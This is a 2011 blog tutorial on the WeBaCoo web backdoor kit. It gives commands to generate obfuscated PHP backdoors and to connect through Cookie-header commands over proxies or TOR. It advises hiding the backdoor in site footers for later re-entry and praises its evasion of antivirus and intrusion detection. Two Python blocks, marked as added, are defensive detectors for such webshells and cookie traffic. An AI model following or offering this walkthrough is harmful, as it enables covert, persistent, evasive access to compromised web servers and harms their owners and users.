Sunday, December 25, 2011

How To use the Web Backdoor Cookie script-kit a.k.a. WeBaCoo

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable of maintaining access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-date AV, NIDS, IPS, Network Firewalls and Application Firewalls, providing a stealth mechanism to execute system commands on the compromised server. The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses.

OK, so if you could not tell, today I am going to give a quick overview of a recent tool release called WeBaCoo. The description from the developer can be found above, but in short it can generate PHP payload code, plain or obfuscated, for a backdoor. The backdoor is connected to via the webacoo.pl Perl script, and communication occurs over HTTP while the commands are actually passed through the cookie parameters. Pretty cool stuff in my opinion! Here is my walkthrough with it…

In order to get started, those of you who want to take advantage of the TOR functionality will also need to install the IO::Socket::Socks module (libio-socket-socks-perl), which can be done very easily through ppm at the command line. Just drop to the command line and install it via ppm with this command:

COMMAND: ppm install IO::Socket::Socks

This should get you what you need to get started and on your way; here is a shot of what it looks like:

We can confirm things are working properly by issuing the help command and reviewing all the options. If you get errors, read the messages and install any other packages that may be required. You should see something like this if all went well:

OK, now that we have our bases covered we can dive in. Let’s start creating some backdoors with this great little tool kit. We will first create a simple backdoor without any obfuscation and then work our way up from there. We start with a simple command following the syntax outlined in the help menu:

COMMAND: webacoo.pl -g -r -o /path/to/output/default-backdoor.php

This generates code for a backdoor (-g) without any obfuscation (-r) and writes it to the path and file name given with the “-o” argument. That is all that is needed to create a basic PHP backdoor. Here is a screenshot of the command terminal view:


Here is a quick view of the generated code:


Now, the default is to run the code generation without the “-r” option, so that the generated code is obfuscated to allow it to remain under the radar a bit longer than average. The non-“-r” version of the same command above:

It results in the following code being generated:


As you can see there is a noticeable difference, which will help prevent it from being detected by basic source code analyzers and/or anti-virus type scans. If the system does not allow the use of the system() function to execute commands, you can also have this changed at code generation time by using the “-f” argument followed by the number representing the command method you would like to use.


The options for the “-f” argument are:
1: system() (the default)
2: shell_exec()
3: exec()
4: passthru()
5: popen()
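From the defender's side, those five functions are exactly what a source scan of a web root should look for, and the obfuscated variant is what a plain grep misses. Here is an added example (not WeBaCoo's code or its actual output) of a small Python scanner that flags PHP where one of the five execution functions receives request input such as $_COOKIE, and that unwraps one eval(base64_decode('...')) layer before rescanning. The samples are constructed; the cookie name 'cm' and the eval/base64 wrapper are assumptions, not the tool's documented scheme.

```python
import base64
import re

# The five command-execution functions the page's "-f" option chooses between.
EXEC_FUNCS = ("system", "shell_exec", "exec", "passthru", "popen")
SUPERGLOBALS = ("_COOKIE", "_GET", "_POST", "_REQUEST")

EXEC_CALL = re.compile(r"\b(%s)\s*\(([^;]*)\)" % "|".join(EXEC_FUNCS))
TAINT_ASSIGN = re.compile(r"\$(\w+)\s*=\s*[^;]*\$(?:%s)\b" % "|".join(SUPERGLOBALS))
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")


def mentions_exec_func(src: str) -> bool:
    """What a basic grep-style scanner does: look for a literal call to one of the functions."""
    return EXEC_CALL.search(src) is not None


def scan_php(src: str, depth: int = 0) -> list:
    """Return (kind, function, detail) findings for one PHP source string."""
    findings = []
    # Variables assigned from request superglobals are treated as attacker-controlled.
    tainted = {m.group(1) for m in TAINT_ASSIGN.finditer(src)}
    for m in EXEC_CALL.finditer(src):
        func, args = m.group(1), m.group(2).strip()
        direct = any("$" + g in args for g in SUPERGLOBALS)
        via_var = any(re.search(r"\$%s\b" % re.escape(v), args) for v in tainted)
        if direct or via_var:
            findings.append(("exec_from_request_input", func, args))
    # eval(base64_decode('...')) hides the call from the grep above: decode one layer
    # and rescan the hidden code, up to a small nesting limit.
    for m in EVAL_B64.finditer(src):
        findings.append(("eval_base64", "eval", f"{len(m.group(1))}-char payload"))
        if depth < 3:
            try:
                inner = base64.b64decode(m.group(1)).decode("utf-8", "replace")
            except ValueError:
                continue
            findings.extend(scan_php(inner, depth + 1))
    return findings


# Constructed samples, not WeBaCoo output. The cookie name 'cm' is hypothetical.
BODY = "$c = $_COOKIE['cm']; passthru(base64_decode($c));"
PLAIN_SAMPLE = "<?php " + BODY + " ?>"
OBFUSCATED_SAMPLE = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(BODY.encode()).decode()

if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SAMPLE), ("obfuscated", OBFUSCATED_SAMPLE)):
        print(label, "grep hit:", mentions_exec_func(sample), "findings:", scan_php(sample))
```

The grep-style check hits the plain sample and misses the obfuscated one; only after decoding the eval wrapper does the same passthru-from-cookie finding appear.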

The syntax works the same as our initial code generation, with the simple addition of the new argument and its option. Here is a quick example of switching to the passthru() method for command execution:

COMMAND: webacoo.pl -g -f 4 -o /path/to/output/backdoor-sys-alt.php


The output appears as follows:

Output with the “-r” option, so you can get an idea of what is going on:


OK, so that covers the basic creation of the PHP backdoor code we will be using. I will leave it up to you to get your code uploaded onto the target server; there are many methods, and many have been documented here on this blog. Once the code is uploaded to our target server we can use it to create a terminal-like experience over the HTTP client/server relationship (I should mention I also like to hide it in footers or specific pages to allow quick and easy re-entry later if needed). As noted by its makers: “The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses.” Assuming we have our code uploaded, I will now show you how it works in action. In order to connect to our uploaded backdoor we just use a few very simple commands:

COMMAND: webacoo.pl -t -u http://www.site.com/backdoor.php
NOTE: You need to include the http:// portion of the URL when connecting, or you will get an error message at line 106 relating to the host value…

WeBaCoo starts by trying to get some basic info for you, but the default commands are set up for a Linux environment. You might get a small error message upon connecting to a Windows environment, as shown above, but it should not give you any problems. On Linux you will be greeted with the id of the current user. You can now go about executing commands on the remote target as if you were sitting there; game over! If you want to see the headers being sent, you can increase the verbosity level, but I prefer the defaults as it can really clutter the terminal screen. Here is a quick view of what the request looks like to initialize the shell:

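The transport described above, commands riding in the Cookie header of otherwise valid requests, is also the thing to hunt for in proxy or web server logs. Here is an added example (not from the original post or the WeBaCoo project) of a detector run over a constructed raw HTTP request: it assumes the command is base64-encoded in a cookie value (the cookie name `cm` and the encoding are assumptions, not the tool's documented format) and flags cookies on requests for .php resources whose values decode to readable text, since a real session cookie is an opaque token.

```python
import base64
import re
import string

PRINTABLE = set(string.printable) - set("\x0b\x0c")


def cookies_of(request: str) -> dict:
    """Parse name=value pairs out of the Cookie header of a raw HTTP request."""
    m = re.search(r"^Cookie:[ \t]*(.+?)\r?$", request, re.M | re.I)
    if not m:
        return {}
    pairs = (p.strip().split("=", 1) for p in m.group(1).split(";") if "=" in p)
    return {k.strip(): v for k, v in pairs}


def decodes_to_text(value: str):
    """Return decoded text if value is strict base64 for printable ASCII, else None."""
    if len(value) < 8 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and all(ch in PRINTABLE for ch in text) else None


def suspicious_cookies(request: str) -> list:
    """Flag (cookie name, decoded text) pairs on requests for PHP resources."""
    request_line = request.split("\n", 1)[0]
    if ".php" not in request_line.lower():
        return []
    flagged = []
    for name, value in cookies_of(request).items():
        text = decodes_to_text(value)
        if text is not None:
            flagged.append((name, text))
    return flagged


# Constructed request, not a capture: a benign session id plus a command-bearing cookie.
SAMPLE_REQUEST = (
    "GET /backdoor.php HTTP/1.1\r\n"
    "Host: www.site.com\r\n"
    "Cookie: PHPSESSID=sess-9f86d081; cm=" + base64.b64encode(b"uname -a").decode() + "\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(suspicious_cookies(SAMPLE_REQUEST))
```

The heuristic will also flag any legitimate application that base64-encodes readable state into a cookie, so treat hits as leads to review against the PHP file they target rather than as verdicts.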
If you don’t have a VPN and still want to remain anonymous, WeBaCoo also includes support for proxies as well as the TOR network (in the latest release). We can activate proxy or TOR support by adding a few flags to the command above; it should look like one of the following depending on your situation:

Enable Proxy Support:
COMMAND: webacoo.pl -t -u http://www.site.com/backdoor.php -p <IP>:port

Enable Authenticated Proxy Support:
COMMAND: webacoo.pl -t -u http://www.site.com/backdoor.php -p user:pass:<IP>:port

Enable TOR Support:
COMMAND: webacoo.pl -t -u http://www.site.com/backdoor.php -p tor

NOTE: You can change the default of port 9050 on 127.0.0.1 by altering the value set on line 38 of the webacoo.pl file itself (most of the script is well commented for easy edits). Also note that I was unable to get properly connected to the remote host due to problems establishing SOCKS connections, possibly due to the Winblows environment, but the cause remains unclear to me…

OK, well, this brings my walkthrough with WeBaCoo to an end. This tool is very cool and indeed handy. I encourage you to check it out, as it is very easy to use and pick up. The source is also well commented, making it easy to edit if and where needed. Continue your thirst for knowledge and innovation, and as always, enjoy!
